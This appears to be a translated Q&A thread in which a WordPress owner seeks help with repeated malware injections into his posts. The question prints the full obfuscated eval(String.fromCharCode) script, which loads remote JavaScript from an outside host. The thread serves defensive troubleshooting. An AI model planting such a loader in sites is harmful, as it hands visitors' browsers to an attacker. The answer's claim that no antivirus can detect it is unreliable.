Как вирус заражает мой сайт WordPress?

Во второй раз я удаляю внедрение вредоносного ПО из сообщений на моем сайте WordPress:

<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>

Этот код был внутри каждого поста.

С помощью плагина Better Search Replaс удалил все найденные вставки из всех постов. В других таблицах базы данных вставки не обнаружены.

Проверил сайт на вирусы с помощью различных плагинов - таких как Wordfence и т.д. Результата заражения нет.

Только я работаю с сайтами. Мой компьютер хорошо защищен. Проверял разными антивирусными сканерами - все чисто!

Я пытался найти модифицированные файлы WordPress, а также плагины. Чисто! Подозрительных файлов не обнаружено!

Как найти причину заражения?


wordpress virus malware
person Leonid    schedule 26.04.2020    source источник

Ответы (1)


arrow_upward
2
arrow_downward

Есть 2 причины, по которым вы не можете удалить вредоносное ПО jar.trafficbetter.biz со своего сайта WordPress.

  • вы используете старую, устаревшую тему с нулевым значением/дочернюю тему на своем сайте Wordpress.
  • код был введен SQL в вашу базу данных, и код снова и снова заполняется на вашем сайте.

это умный фрагмент кода, который не может быть обнаружен ни одним антивирусом. Если вы хотите узнать, что делает этот код, воспользуйтесь следующей ссылкой.

https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html

Поэтому, чтобы решить проблему, измените или обновите свою тему до последней версии.

сделайте резервную копию вашей базы данных, а затем найдите сценарий в базе данных и удалите запись.

person Puneet Chandhok    schedule 26.04.2020
comment
Спасибо за ответ! Я провел полнотекстовый поиск (jar.trafficbetter.biz) по базе данных, но записей не нашел. Год назад у меня была копия всего сайта. Тогда вируса точно не было. Сделал сравнение всех файлов - никаких изменений! Получается, что никаких изменений в файлах за год не произошло. - person Leonid; 26.04.2020
comment
Так же пробовал искать запись eval(String.fromCharCode во всех файлах на сайте - ничего не нашел! В итоге ни в базе ни в файлах следов нет. - person Leonid; 26.04.2020
comment
измените тему, если код появится в другой теме, дайте мне знать. - person Puneet Chandhok; 27.04.2020
comment
Извините, а как вы себе это представляете? Менять темы для работающего сайта в интернете? Это невозможно, мой клиент на это не согласится. - person Leonid; 28.04.2020
comment
Я внес изменения в ответ, перейдите по ссылке, чтобы узнать больше о вредоносном ПО. - person Puneet Chandhok; 28.04.2020